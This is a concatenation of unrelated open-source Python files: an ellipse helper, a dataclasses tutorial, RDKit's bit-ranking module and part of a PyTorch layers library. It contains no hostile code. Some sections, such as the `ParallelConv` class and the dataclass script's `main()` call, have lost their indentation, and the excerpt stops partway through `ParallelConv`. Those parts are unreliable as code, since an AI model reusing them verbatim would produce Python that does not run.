    Build an ellipse with the given characteristics.

    Parameters
    ----------
    center : array-like
        2D Coordinates of center.
    phi : float
        Angle, in radians, of the major axis w.r.t. the X-axis
    axes : array-like
        Lengths of major and minor axes, respectively.
    num_points : int
        Number of points. Defaults to 20.

    Returns
    -------
    points : numpy.ndarray
        (num_points+1)-by-2 array with the coordinates of the ellipse.
    """
    angles = np.linspace(0.0, 2.0*np.pi, num_points+1)
    a, b = axes
    # Parametric ellipse rotated by phi about its center.
    cos_t, sin_t = np.cos(angles), np.sin(angles)
    cos_p, sin_p = np.cos(phi), np.sin(phi)
    xs = center[0] + a*cos_t*cos_p - b*sin_t*sin_p
    ys = center[1] + a*cos_t*sin_p + b*sin_t*cos_p
    return np.stack([xs, ys], axis=1)
|
dataclassses_howto.py | CvanderStoep/VideosSampleCode | 285 | 9811 | <gh_stars>100-1000
import dataclasses
import inspect
from dataclasses import dataclass, field
from pprint import pprint
import attr
class ManualComment:
    """Hand-rolled version of the Comment dataclass.

    Every dunder that @dataclass(frozen=True, order=True) would generate
    (repr, equality, ordering, hash) is written out explicitly, for
    comparison with the generated variants below.
    """

    def __init__(self, id: int, text: str):
        self.id: int = id
        self.text: str = text

    def _fields(self):
        # Tuple shared by all comparison/hash dunders.
        return (self.id, self.text)

    def __repr__(self):
        return "{}(id={}, text={})".format(self.__class__.__name__, self.id, self.text)

    def __eq__(self, other):
        if other.__class__ is not self.__class__:
            return NotImplemented
        return self._fields() == other._fields()

    def __ne__(self, other):
        eq = self.__eq__(other)
        return eq if eq is NotImplemented else not eq

    def __hash__(self):
        # Include the class so subclasses with equal fields hash differently.
        return hash((self.__class__,) + self._fields())

    def __lt__(self, other):
        if other.__class__ is not self.__class__:
            return NotImplemented
        return self._fields() < other._fields()

    def __le__(self, other):
        if other.__class__ is not self.__class__:
            return NotImplemented
        return self._fields() <= other._fields()

    def __gt__(self, other):
        if other.__class__ is not self.__class__:
            return NotImplemented
        return self._fields() > other._fields()

    def __ge__(self, other):
        if other.__class__ is not self.__class__:
            return NotImplemented
        return self._fields() >= other._fields()
@dataclass(frozen=True, order=True)
class Comment:
    """Immutable, orderable comment; the generated dunders match ManualComment."""
    id: int
    text: str = ""
    # Mutable default via default_factory; excluded from repr and comparisons.
    replies: list[int] = field(default_factory=list, repr=False, compare=False)
@attr.s(frozen=True, order=True, slots=True)
class AttrComment:
    """attrs-based equivalent of Comment.

    NOTE(review): @attr.s without auto_attribs=True ignores bare annotated
    fields, so id/text here are likely plain class attributes rather than
    attrs-managed fields -- confirm whether auto_attribs (or @attr.define)
    was intended.
    """
    id: int = 0
    text: str = ""
def main():
    """Exercise the Comment dataclass helpers and dump its generated methods."""
    comment = Comment(1, "I just subscribed!")
    # comment.id = 3  # would raise FrozenInstanceError: the dataclass is frozen
    print(comment)
    print(dataclasses.astuple(comment))
    print(dataclasses.asdict(comment))
    # replace() builds a new instance since the original is immutable.
    print(dataclasses.replace(comment, id=3))
    pprint(inspect.getmembers(Comment, inspect.isfunction))
if __name__ == '__main__':
main()
|
rdkit/ML/InfoTheory/BitRank.py | kazuyaujihara/rdkit | 1,609 | 9818 | <filename>rdkit/ML/InfoTheory/BitRank.py
#
# Copyright (C) 2001,2002,2003 <NAME> and Rational Discovery LLC
#
""" Functionality for ranking bits using info gains
**Definitions used in this module**
- *sequence*: an object capable of containing other objects which supports
__getitem__() and __len__(). Examples of these include lists, tuples, and
Numeric arrays.
- *IntVector*: an object containing integers which supports __getitem__() and
__len__(). Examples include lists, tuples, Numeric Arrays, and BitVects.
**NOTE**: Neither *sequences* nor *IntVectors* need to support item assignment.
It is perfectly acceptable for them to be read-only, so long as they are
random-access.
"""
import numpy
from rdkit.ML.InfoTheory import entropy
def FormCounts(bitVects, actVals, whichBit, nPossibleActs, nPossibleBitVals=2):
  """ generates the counts matrix for a particular bit

    **Arguments**

      - bitVects: a *sequence* containing *IntVectors*

      - actVals: a *sequence*

      - whichBit: an integer, the bit number to use.

      - nPossibleActs: the (integer) number of possible activity values.

      - nPossibleBitVals: (optional) if specified, this integer provides the maximum
        value attainable by the (increasingly inaccurately named) bits in _bitVects_.

    **Returns**

      a nPossibleBitVals x nPossibleActs integer array where entry [v, a] counts
      the points with bit value v and activity a

    **Notes**

      This is really intended for internal use.

  """
  if len(bitVects) != len(actVals):
    raise ValueError('var and activity lists should be the same length')
  # Fix: the abstract `numpy.integer` scalar type is deprecated/removed as a
  # dtype in modern NumPy; numpy.int_ is the concrete default integer type.
  res = numpy.zeros((nPossibleBitVals, nPossibleActs), numpy.int_)
  for i in range(len(bitVects)):
    res[bitVects[i][whichBit], actVals[i]] += 1
  return res
def CalcInfoGains(bitVects, actVals, nPossibleActs, nPossibleBitVals=2):
  """ Calculates the information gain for a set of points and activity values

    **Arguments**

      - bitVects: a *sequence* containing *IntVectors*

      - actVals: a *sequence*

      - nPossibleActs: the (integer) number of possible activity values.

      - nPossibleBitVals: (optional) if specified, this integer provides the maximum
        value attainable by the (increasingly inaccurately named) bits in _bitVects_.

    **Returns**

      a numpy float array with one info gain per bit

  """
  if len(bitVects) != len(actVals):
    raise ValueError('var and activity lists should be the same length')
  nBits = len(bitVects[0])
  # Fix: `numpy.float` (an alias for the builtin float) was removed in
  # NumPy >= 1.24; the builtin keeps the same float64 array dtype.
  res = numpy.zeros(nBits, float)
  for bit in range(nBits):
    counts = FormCounts(bitVects, actVals, bit, nPossibleActs, nPossibleBitVals=nPossibleBitVals)
    res[bit] = entropy.InfoGain(counts)
  return res
def RankBits(bitVects, actVals, nPossibleBitVals=2, metricFunc=CalcInfoGains):
  """ Rank a set of bits according to a metric function

    **Arguments**

      - bitVects: a *sequence* containing *IntVectors*

      - actVals: a *sequence*

      - nPossibleBitVals: (optional) maximum value attainable by the bits
        in _bitVects_

      - metricFunc: (optional) the metric function to be used. See _CalcInfoGains()_
        for a description of the signature of this function.

    **Returns**

      A 2-tuple containing:

        - the relative order of the bits (a list of ints, best first)

        - the metric calculated for each bit (a list of floats)

  """
  nPossibleActs = max(actVals) + 1
  scores = metricFunc(bitVects, actVals, nPossibleActs, nPossibleBitVals=nPossibleBitVals)
  # Highest-metric bits first: ascending argsort, then reversed.
  ranking = list(numpy.argsort(scores))[::-1]
  return ranking, scores
def AnalyzeSparseVects(bitVects, actVals):
  """ Computes the info gain of each bit for sparse bit vectors vs binary activities

    **Arguments**

      - bitVects: a *sequence* containing SBVs

      - actVals: a *sequence* of binary activities

    **Returns**

      a 2-tuple containing:

        - a list of (bit, gain, nActive, nInactive) tuples for every bit that
          was set at least once

        - the corresponding list of info gains

    **Notes**

      - these need to be bit vects and binary activities

  """
  nPts = len(bitVects)
  if nPts != len(actVals):
    raise ValueError('var and activity lists should be the same length')
  nBits = bitVects[0].GetSize()

  # Fix: the abstract `numpy.integer` scalar type is deprecated/removed as a
  # dtype in modern NumPy; numpy.int_ is the concrete default integer type.
  actives = numpy.zeros(nBits, numpy.int_)
  inactives = numpy.zeros(nBits, numpy.int_)
  nActives, nInactives = 0, 0
  # Tally, per bit, how many active/inactive points have the bit set.
  for i in range(nPts):
    sig, act = bitVects[i], actVals[i]
    onBitList = sig.GetOnBits()
    if act:
      for bit in onBitList:
        actives[bit] += 1
      nActives += 1
    else:
      for bit in onBitList:
        inactives[bit] += 1
      nInactives += 1
  resTbl = numpy.zeros((2, 2), numpy.int_)
  res = []
  gains = []
  for bit in range(nBits):
    nAct, nInact = actives[bit], inactives[bit]
    # Skip bits that were never set in any vector.
    if nAct or nInact:
      resTbl[0, 0] = nAct
      resTbl[1, 0] = nPts - nAct
      resTbl[0, 1] = nInact
      resTbl[1, 1] = nPts - nInact
      gain = entropy.InfoGain(resTbl)
      gains.append(gain)
      res.append((bit, gain, nAct, nInact))
  return res, gains
def SparseRankBits(bitVects, actVals, metricFunc=AnalyzeSparseVects):
  """ Rank a set of sparse bit vectors' bits according to a metric function

    **Arguments**

      - bitVects: a *sequence* containing SBVs

      - actVals: a *sequence*

      - metricFunc: (optional) the metric function to be used. See _AnalyzeSparseVects()_
        for a description of the signature of this function.

    **Returns**

      A 2-tuple containing:

        - the relative order of the bits (a list of ints, best first)

        - the per-bit info returned by the metric function

    **Notes**

      - these need to be bit vects and binary activities

  """
  info, scores = metricFunc(bitVects, actVals)
  # Highest-metric bits first: ascending argsort, then reversed.
  ranking = list(numpy.argsort(scores))[::-1]
  return ranking, info
|
layers/eight_mile/pytorch/layers.py | dpressel/baseline | 241 | 9820 | <gh_stars>100-1000
import copy
import math
import logging
from typing import Dict, List, Optional, Tuple, Union
import os
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.jit as jit
import torch.autograd
import contextlib
import glob
from eight_mile.utils import listify, Offsets, is_sequence, str2bool, get_alibi_slopes
from eight_mile.utils import transition_mask as transition_mask_np
MASK_FALSE = False
logger = logging.getLogger("mead.layers")
def sequence_mask(lengths: torch.Tensor, max_len: int = -1) -> torch.Tensor:
    """Generate a `[B, T]` boolean mask from a vector of sequence lengths.

    :param lengths: A `[B]` tensor containing the lengths of each example
    :param max_len: Width of the mask; inferred from `lengths` when negative
    :return: A `[B, T]` mask, True where a position is within the length
    """
    lengths_cpu = lengths.cpu()
    width = torch.max(lengths_cpu) if max_len < 0 else max_len
    # Broadcast a [1, T] position index against the [B, 1] lengths.
    positions = torch.arange(0, width).type_as(lengths_cpu).unsqueeze(0)
    return positions < lengths_cpu.unsqueeze(1)
def sequence_mask_mxlen(lengths: torch.Tensor, max_len: int) -> torch.Tensor:
    """Generate a `[B, max_len]` boolean mask from sequence lengths.

    Same as `sequence_mask` but the width is always the given plain int,
    which primarily makes ONNX tracing work better.

    :param lengths: A `[B]` tensor containing the lengths of each example
    :param max_len: The fixed width of the mask
    :return: A `[B, max_len]` mask
    """
    lengths_cpu = lengths.cpu()
    # Broadcast a [1, max_len] position index against the [B, 1] lengths.
    positions = torch.arange(0, max_len).type_as(lengths_cpu).unsqueeze(0)
    return positions < lengths_cpu.unsqueeze(1)
@torch.jit.script
def truncate_mask_over_time(mask: torch.Tensor, x: torch.Tensor) -> torch.Tensor:
    """Clip a `[B, T]` mask down to the time dimension of `x` (`[B, Tout, ...]`)."""
    return mask[:, : x.shape[1]]
def vec_log_sum_exp(vec: torch.Tensor, dim: int) -> torch.Tensor:
    """Numerically stable log-sum-exp along `dim` (the reduced dim is kept).

    :param vec: Input tensor
    :param dim: Dimension to reduce over
    :return: Tensor with `dim` kept as size 1
    """
    # Shift by the max so exp() cannot overflow, then add the max back.
    shift, _ = torch.max(vec, dim, keepdim=True)
    return shift + torch.log(torch.sum(torch.exp(vec - shift.expand_as(vec)), dim, keepdim=True))
def unsort_batch(batch: torch.Tensor, perm_idx: torch.Tensor) -> torch.Tensor:
    """Undo the sort applied to a batch (inverse permutation along dim 0).

    :param batch: The batch of data, batch first `[B, ...]`
    :param perm_idx: The permutation index returned from torch.sort
    :returns: The batch in the original order
    """
    perm = perm_idx.to(batch.device)
    # Append singleton dims until the permutation can broadcast over the batch.
    while perm.dim() < batch.dim():
        perm = perm.unsqueeze(-1)
    return torch.scatter(torch.zeros_like(batch), 0, perm.expand_as(batch), batch)
def infer_lengths(tensor, dim=1):
    """Infer the lengths of an input based on the idea the Offsets.PAD was used as the padding token.

    :param tensor: The data to infer the length of, should be either [B, T] or [T, B]
    :param dim: The dimension which contains the sequential signal
    :returns: A Tensor of shape `[B]` that has the lengths for example item in the batch
    """
    if len(tensor.shape) != 2:
        raise ValueError(f"infer_lengths only works with tensors wit two dims right now, got {len(tensor.shape)}")
    # Position indices 1..T along the sequence dim, broadcastable over the batch dim.
    offsets = torch.arange(1, tensor.shape[dim] + 1, device=tensor.device, dtype=tensor.dtype).unsqueeze(1 - dim)
    # 1 where the token is not PAD, 0 where it is.
    non_pad_loc = (tensor != Offsets.PAD).to(tensor.dtype)
    # argmax of position*mask picks the last non-pad position; +1 turns it into a length.
    # NOTE(review): assumes pads only trail (no internal PAD tokens) and each row
    # has at least one non-pad token -- an all-pad row yields length 1, not 0.
    return torch.argmax(non_pad_loc * offsets, dim=dim) + 1
def tensor_and_lengths(inputs) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
    """Normalize an input that may or may not carry lengths.

    Accepts either a `(tensor, lengths)` pair or a bare tensor and always
    returns a 2-tuple, using `None` for the lengths when they are absent.

    TODO: this function should probably be changed to always return the lengths second.
    To do this, we just need a sentinel value, e.g. <PAD> (0). The problem with doing this is
    that it might be possible to generate <PAD> in the middle of the tensor which would make that
    length invalid.

    :param inputs: Either a sequence of the `(tensor, length)` or just the `tensor`
    :return: A `Tuple` of `(tensor, length)` or `(tensor, None)`
    """
    if not isinstance(inputs, (list, tuple)):
        return inputs, None
    in_tensor, lengths = inputs
    return in_tensor, lengths
class VariationalDropout(nn.Module):
    """Inverted dropout that applies the same mask at each time step.

    A single Bernoulli mask is drawn over the non-time dims and broadcast
    across time, so the same units are dropped at every step of a sequence.
    """

    def __init__(self, pdrop: float = 0.5, batch_first: bool = False):
        """Variational Dropout

        :param pdrop: the probability of dropping a unit
        :param batch_first: whether inputs are `[B, T, H]` (True) or `[T, B, H]`
        """
        super().__init__()
        self.pdrop = pdrop
        self.batch_first = batch_first

    def extra_repr(self):
        return "p=%.1f" % self.pdrop

    def forward(self, input: torch.Tensor) -> torch.Tensor:
        """Apply the shared-over-time dropout mask (identity in eval mode)."""
        if not self.training:
            return input
        # Create a mask that covers a single time step
        if self.batch_first:
            dim0 = input.size(0)
            dim1 = 1
        else:
            dim0 = 1
            dim1 = input.size(1)
        mask = torch.zeros(dim0, dim1, input.size(2)).bernoulli_(1 - self.pdrop).to(input.device)
        # Fix: inverted dropout rescales kept units by the keep probability
        # (1 - pdrop), not by pdrop; dividing by pdrop skewed E[output] for
        # every pdrop other than 0.5.
        mask = mask / (1 - self.pdrop)
        # Broadcast the mask over the sequence
        return mask * input
class SequenceLoss(nn.Module):
    """Computes the loss over a sequence"""

    def __init__(self, LossFn: nn.Module = nn.NLLLoss, avg: str = "token"):
        """A class that applies a Loss function to sequence via the folding trick.

        :param LossFn: A loss function to apply (defaults to `nn.NLLLoss`)
        :param avg: A divisor to apply, valid values are `token` and `batch`
        """
        super().__init__()
        self.avg = avg
        if avg == "token":
            # Mean over all non-pad tokens: the criterion does the averaging.
            self.crit = LossFn(ignore_index=Offsets.PAD, reduction="mean")
            self._norm = self._no_norm
        else:
            # Sum over tokens, then divide by the batch size in _batch_norm.
            self.crit = LossFn(ignore_index=Offsets.PAD, reduction="sum")
            self._norm = self._batch_norm

    def _batch_norm(self, loss, inputs):
        # Normalize the summed loss by the batch size (first dim of inputs).
        return loss / inputs.size()[0]

    def _no_norm(self, loss, inputs):
        # Token averaging is already handled by the criterion's reduction="mean".
        return loss

    def forward(self, inputs: torch.Tensor, targets: torch.Tensor) -> torch.Tensor:
        """Evaluate some loss over a sequence.

        :param inputs: torch.FloatTensor, [B, .., C] The scores from the model. Batch First
        :param targets: torch.LongTensor, The labels.
        :returns: torch.FloatTensor, The loss.
        """
        # Fold all sequence dims into one big "batch" of time steps.
        total_sz = targets.nelement()
        loss = self.crit(inputs.view(total_sz, -1), targets.view(total_sz))
        return self._norm(loss, inputs)

    def extra_repr(self):
        return f"reduction={self.avg}"
class LabelSmoothingLoss(nn.Module):
    def __init__(self, label_smoothing, ignore_index=0, reduction="none"):
        """Use Label smoothing from `Szegedy et. al., 2015`_ to temper model confidence.

        Implements add-gamma smoothing where the probability mass of the gold label distribution
        is smoothed across classes.

        This implementation is based on `OpenNMT-py`_ but has been adapted to not require the
        vocabulary size up front.

        :param label_smoothing: mass to redistribute from the gold label, in (0, 1]
        :param ignore_index: class index that receives no mass (padding)
        :param reduction: kl_div reduction; "mean" is mapped to "batchmean"

        .. _Szegedy et. al., 2015: https://arxiv.org/abs/1512.00567
        .. _OpenNMY-py: https://github.com/OpenNMT/OpenNMT-py/blob/938a4f561b07f4d468647823fab761cfb51f21da/onmt/utils/loss.py#L194
        """
        # Validate before super().__init__() so bad configs fail immediately.
        if not (0.0 < label_smoothing <= 1.0):
            raise ValueError(f"`label_smoothing` must be between 0.0 and 1.0, got {label_smoothing}")
        super().__init__()
        self.ignore_index = ignore_index
        self.label_smoothing = label_smoothing
        # Probability mass left on the gold label.
        self.confidence = 1.0 - label_smoothing
        # F.kl_div's "batchmean" matches what most losses call "mean".
        self.reduction = reduction if reduction != "mean" else "batchmean"

    def forward(self, output: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
        """
        :param output: The model outputs (expected as log-probabilities), [B, V]
        :param target: The target labels, [B]
        """
        B, V = output.size()
        # Spread the smoothing mass uniformly over the V-2 classes that are
        # neither the gold label nor the ignored index.
        smoothed = torch.full((B, V), self.label_smoothing / (V - 2))
        smoothed[:, self.ignore_index] = 0
        # Put the remaining confidence on the gold label.
        smoothed = torch.scatter(smoothed, 1, target.unsqueeze(1), self.confidence)
        # Zero out entire rows whose target is the ignore index.
        smoothed = smoothed.masked_fill_((target == self.ignore_index).unsqueeze(1), 0)
        return F.kl_div(output, smoothed, reduction=self.reduction)

    def extra_repr(self):
        return f"label_smoothing={self.label_smoothing}"
class MeanPool1D(nn.Module):
    """Mean-pool a sequence over time, normalizing by the true sequence lengths."""

    def __init__(self, outsz, batch_first=True):
        """Set up the pooling module.

        :param outsz: The output dim, exposed for downstream access
        :param batch_first: Is this module batch first or time first?
        """
        super().__init__()
        self.batch_first = batch_first
        # Time axis is dim 1 for [B, T, H] inputs, dim 0 for [T, B, H].
        self.reduction_dim = 1 if self.batch_first else 0
        self.output_dim = outsz
        # Tells callers this layer needs (tensor, lengths) inputs.
        self.requires_length = True

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Apply mean pooling over the valid (non-padded) time steps.

        :param inputs: A tuple of `(input, lengths)`
        :return: Pooled output of shape `[B, H]`
        """
        tensor, lengths = tensor_and_lengths(inputs)
        # Summing over time yields [B, H] for either layout, so the [B]
        # lengths are unsqueezed to [B, 1] in order to broadcast.
        summed = torch.sum(tensor, self.reduction_dim, keepdim=False)
        denom = torch.unsqueeze(lengths, -1).to(tensor.dtype).to(tensor.device)
        return summed / denom

    def extra_repr(self):
        return f"batch_first={self.batch_first}"
class MaxPool1D(nn.Module):
    """Do a max-pooling operation with or without a length given
    """

    def __init__(self, outsz, batch_first=True):
        """Set up the pooling module.

        :param outsz: The output dim, exposed for downstream access
        :param batch_first: Is this module batch first or time first?
        """
        super().__init__()
        self.batch_first = batch_first
        # Max over time: dim 1 for [B, T, H] inputs, dim 0 for [T, B, H].
        self.reduction_dim = 1 if self.batch_first else 0
        self.output_dim = outsz

    def forward(self, inputs: Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]) -> torch.Tensor:
        """If we are given a tuple as input, we will use the length, otherwise we will do an operation without masking

        :param inputs: either a tuple of `(input, lengths)` or a tensor `input`
        :return: A pooled tensor
        """
        tensor, lengths = tensor_and_lengths(inputs)
        if lengths is not None:
            # If tensor = `[B, T, H]`
            #    mask = `[B, T, 1]`
            # If tensor = `[T, B, H]`
            #    mask = `[T, B, 1]`
            # So it will mask all the values in H past the right length
            mask = sequence_mask(lengths).to(tensor.device)
            mask = mask if self.batch_first else bth2tbh(mask)
            # Fill masked with very negative so it never gets selected
            # NOTE(review): -1e4 (not -inf) assumes real feature values stay
            # well above -1e4 -- confirm for half-precision use.
            tensor = tensor.masked_fill(mask.unsqueeze(-1) == MASK_FALSE, -1e4)
        dmax, _ = torch.max(tensor, self.reduction_dim, keepdim=False)
        return dmax

    def extra_repr(self) -> str:
        return f"batch_first={self.batch_first}"
# Torch only added this module in 1.4.0, shim
class GeLU(nn.Module):
    """Module wrapper around the GELU activation (shim for torch < 1.4)."""

    def forward(self, x):
        return F.gelu(x)
#Code taken from: https://github.com/huggingface/transformers/blob/766d4bf7920213bdd8a8afb42a72719190124568/src/transformers/activations.py#L27
class Gpt2GELU(nn.Module):
    """
    Implementation of the GELU activation function currently in Google BERT repo (identical to OpenAI GPT). Also see
    the Gaussian Error Linear Units paper: https://arxiv.org/abs/1606.08415
    """

    def forward(self, input):
        # tanh approximation: 0.5*x*(1 + tanh(sqrt(2/pi)*(x + 0.044715*x^3)))
        inner = math.sqrt(2.0 / math.pi) * (input + 0.044715 * torch.pow(input, 3.0))
        return 0.5 * input * (1.0 + torch.tanh(inner))
def get_activation(name: str = "relu") -> nn.Module:
    """Get back an `nn.Module` by string name of the activation operator

    :param name: A string name of the operation
    :return: A module associated with that string (`nn.ReLU` for unknown names)
    """
    if name is None or name == "ident":
        return nn.Identity()
    # Lazy factories: nothing is constructed until the requested entry is called.
    factories = {
        "tanh": nn.Tanh,
        "gelu": lambda: GeLU(),
        "hardtanh": nn.Hardtanh,
        "leaky_relu": nn.LeakyReLU,
        "prelu": nn.PReLU,
        "sigmoid": nn.Sigmoid,
        "log_sigmoid": nn.LogSigmoid,
        "log_softmax": lambda: nn.LogSoftmax(dim=-1),
        "softmax": lambda: nn.Softmax(dim=-1),
        "gpt2_gelu": lambda: Gpt2GELU(),
    }
    factory = factories.get(name, nn.ReLU)
    return factory()
def _cat_dir(h: torch.Tensor) -> torch.Tensor:
"""Concat forward and backword state vectors.
The shape of the hidden is `[#layers * #dirs, B, H]`. The docs say you can
separate directions with `h.view(#l, #dirs, B, H)` with the forward dir being
index 0 and backwards dir being 1.
This means that before separating with the view the forward dir are the even
indices in the first dim while the backwards dirs are the odd ones. Here we select
the even and odd values and concatenate them
:param h: The hidden shape as it comes back from PyTorch modules
"""
return torch.cat([h[0 : h.size(0) : 2], h[1 : h.size(0) : 2]], dim=-1)
def concat_state_dirs(state):
    """Fuse the direction pairs of a bidirectional RNN state (h, or the (h, c) pair)."""
    if isinstance(state, tuple):
        return tuple(map(_cat_dir, state))
    return _cat_dir(state)
class Conv1DSame(nn.Module):
    """Perform a 1D convolution with output size same as input size

    To make this operation work as expected, we cannot just use `padding=kernel_size//2` inside
    of the convolution operation. Instead, we zeropad the input using the `ConstantPad1d` module

    """
    def __init__(self, in_channels: int, out_channels: int, kernel_size: int, bias: bool = True, groups: int = 1, unif: float = 0.0, initializer: Optional[str] = None, activation: Optional[str] = None):
        """Create a 1D conv to produce the same output size as input

        :param in_channels: The number of input feature maps
        :param out_channels: The number of output feature maps
        :param kernel_size: The kernel size
        :param bias: Is bias on?
        :param groups: Number of conv groups
        :param unif: uniform init range forwarded to `pytorch_conv1d`
        :param initializer: weight initializer name forwarded to `pytorch_conv1d`
        :param activation: optional activation name applied after the conv
        """
        super().__init__()
        # Asymmetric zero padding keeps output length == input length for both
        # odd and even kernels (even kernels pad one element less at the start).
        end_pad = kernel_size // 2
        start_pad = end_pad - 1 if kernel_size % 2 == 0 else end_pad
        self.conv = nn.Sequential(
            nn.ConstantPad1d((start_pad, end_pad), 0.),
            pytorch_conv1d(in_channels, out_channels, kernel_size, unif=unif, initializer=initializer, bias=bias, groups=groups),
            get_activation(activation)
        )

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Do convolution1d on an input tensor, `[B, C, T]`

        :param x: The input tensor of shape `[B, C, T]`
        :return: The output tensor of shape `[B, H, T]`
        """
        return self.conv(x)
class ConvEncoder(nn.Module):
    """Single 1D convolutional encoder layer with activation and optional dropout.

    Consumes a temporal signal shaped either `[B, C, T]` or `[B, T, C]` (chosen
    at construction) and emits the same orientation (`[B, H, T]` or `[B, T, H]`).
    The default `[B, T, H]` layout is the more typical one, but it requires
    transposing the last two dims on either side of the convolution.
    """

    def __init__(self, insz: int, outsz: int, filtsz: int, pdrop: float = 0.0, activation: str = "relu", bias: bool = True, groups: int = 1, hidden_last=True):
        """Construct the encoder with optional dropout, given activation, and orientation.

        :param insz: The number of input feature maps
        :param outsz: The number of output feature maps (or hidden size)
        :param filtsz: The kernel size
        :param pdrop: The amount of dropout to apply, defaults to 0
        :param activation: The activation function by name, defaults to `relu`
        :param bias: Use bias?
        :param groups: How many conv groups. Defaults to 1
        :param hidden_last: PyTorch only! If `True` the orientation is `[B, T, H]`, o.w. `[B, H, T]`
        """
        super().__init__()
        self.output_dim = outsz
        stages = [
            Conv1DSame(insz, outsz, filtsz, bias=bias, groups=groups),
            get_activation(activation),
            nn.Dropout(pdrop),
        ]
        if hidden_last:
            # Sandwich the conv pipeline between layout conversions
            stages = [BTH2BHT()] + stages + [BHT2BTH()]
        self.conv = nn.Sequential(*stages)

    def forward(self, input: torch.Tensor) -> torch.Tensor:
        """Apply conv, activation and dropout, preserving the input orientation."""
        return self.conv(input)
class ConvEncoderStack(nn.Module):
    """Stack of convolutional encoders with residual connections, built on `ConvEncoder`.

    Each layer zero-pads so the temporal length is preserved throughout, and the
    final layer's sequence is returned. As in `ConvEncoder`, input may be
    `[B, C, T]` or `[B, T, C]` depending on the constructor; for the default
    `[B, T, C]` orientation the stack transposes on entry and exit.
    """

    def __init__(self, insz: int, outsz: int, filtsz: int, nlayers: int = 1, pdrop: float = 0.0, activation: str = "relu", bias: bool = True, groups: int = 1, hidden_last=True):
        """Construct the encoder stack.

        :param insz: The input number of feature maps
        :param outsz: The output number of feature maps
        :param filtsz: The kernel size
        :param nlayers: The number of layers in the stack (defaults to a single layer)
        :param pdrop: The amount of dropout to apply (defaults to `0`)
        :param activation: The activation function to use as a string, defaults to `relu`
        :param bias: Use bias?
        :param groups: How many conv groups. Defaults to 1
        :param hidden_last: PyTorch only! If `True` the orientation is `[B, T, H]`, o.w. `[B, H, T]`
        """
        super().__init__()
        base = ConvEncoder(insz, outsz, filtsz, pdrop, activation, bias, groups, hidden_last=False)
        # First layer converts the layout (if needed) and maps insz -> outsz
        first = nn.Sequential(BTH2BHT(), base) if hidden_last else base
        # Remaining layers are residual outsz -> outsz encoders
        residual = ResidualBlock(ConvEncoder(outsz, outsz, filtsz, pdrop, activation, bias, groups, hidden_last=False))
        self.layers = nn.ModuleList([first] + [copy.deepcopy(residual) for _ in range(nlayers - 1)])
        if hidden_last:
            self.layers.append(BHT2BTH())
        self.output_dim = outsz

    def forward(self, input: torch.Tensor) -> torch.Tensor:
        """Apply a stack of 1D convolutions with residual connections between them.

        :param input: A tensor of shape `[B, T, C]` or `[B, C, T]` depending on `hidden_last`
        :return: A tensor of shape `[B, T, H]` or `[B, H, T]` depending on `hidden_last`
        """
        hidden = input
        for stage in self.layers:
            hidden = stage(hidden)
        return hidden
def bth2bht(t: torch.Tensor) -> torch.Tensor:
    """Swap the last two dims, converting `[B, T, H]` to `[B, H, T]`."""
    return t.permute(0, 2, 1).contiguous()
class BTH2BHT(nn.Module):
    """Utility layer to convert from `[B, T, H]` to `[B, H, T]`."""

    def forward(self, t: torch.Tensor) -> torch.Tensor:
        # Equivalent to the module-level bth2bht helper, inlined here.
        return t.transpose(1, 2).contiguous()
def tbh2bht(t: torch.Tensor) -> torch.Tensor:
    """Convert `[T, B, H]` to `[B, H, T]`: batch first, hidden second, time last."""
    # [T, B, H] -> [B, T, H] -> [B, H, T]
    return t.transpose(0, 1).transpose(1, 2).contiguous()
class TBH2BHT(nn.Module):
    """Utility layer to convert from `[T, B, H]` to `[B, H, T]`."""

    def forward(self, t: torch.Tensor) -> torch.Tensor:
        # Equivalent to the module-level tbh2bht helper, inlined here.
        return t.permute(1, 2, 0).contiguous()
def tbh2bth(t: torch.Tensor) -> torch.Tensor:
    """Convert `[T, B, H]` to `[B, T, H]` by swapping the first two dims."""
    return t.permute(1, 0, 2).contiguous()
class TBH2BTH(nn.Module):
    """Utility layer to convert from `[T, B, H]` to `[B, T, H]`."""

    def forward(self, t: torch.Tensor) -> torch.Tensor:
        # Equivalent to the module-level tbh2bth helper, inlined here.
        return t.transpose(0, 1).contiguous()
def bth2tbh(t: torch.Tensor) -> torch.Tensor:
    """Convert `[B, T, H]` to `[T, B, H]` by swapping the first two dims."""
    return t.permute(1, 0, 2).contiguous()
class BTH2TBH(nn.Module):
    """Utility layer to convert from `[B, T, H]` to `[T, B, H]`."""

    def forward(self, t: torch.Tensor) -> torch.Tensor:
        # Equivalent to the module-level bth2tbh helper, inlined here.
        return t.transpose(0, 1).contiguous()
def bht2bth(t: torch.Tensor) -> torch.Tensor:
    """Swap the last two dims, converting `[B, H, T]` to `[B, T, H]`."""
    return t.permute(0, 2, 1).contiguous()
class BHT2BTH(nn.Module):
    """Utility layer to convert from `[B, H, T]` to `[B, T, H]`."""

    def forward(self, t: torch.Tensor) -> torch.Tensor:
        # Equivalent to the module-level bht2bth helper, inlined here.
        return t.transpose(1, 2).contiguous()
class ParallelConv(nn.Module):
"""Layer of parallel convolutions with varying filter sizes followed by max over time pooling
This module takes an input tensor of any orientation based on its constructor, and pools its
output to shape `[B, H]`, where `H` is `outsz * len(filtsz)`
"""
def __init__(self, insz: int, outsz: int, filtsz: List[int], activation: str = "relu", input_fmt: str = "bth"):
"""
Constructor for a parallel convolution from any orientation tensor input
:param insz: The number of input feature maps
:param outsz: The number of output feature maps
:param filtsz: The kernel size as a list of parallel filters to apply, e.g. `[3, 4, 5]`
:param activation: An activation function by name to apply
:param input_fmt: A string for the orientation. Valid values are `bth` or `btc` meaning hidden units last,
`bht` or `bct` meaning the temporal dim last or `tbh` or `tbc` meaning the hidden units last and the temporal dim
first
"""
super().__init__()
self.requires_length = False
convs = []
outsz_filts = outsz
self.input_fmt = input_fmt.lower()
if type(outsz) == int:
outsz_filts = len(filtsz) * [outsz]
self.output_dim = sum(outsz_filts)
for i, fsz in enumerate(filtsz):
if fsz % 2 == 0:
conv = Conv1DSame(insz, outsz_filts[i], fsz)
else:
pad = fsz // 2
conv = nn.Conv1d(insz, outsz_filts[i], fsz, padding=pad)
conv = nn.Sequential(
conv,
get_activation(activation)
)
convs.append(conv)
# Add the module so its managed correctly
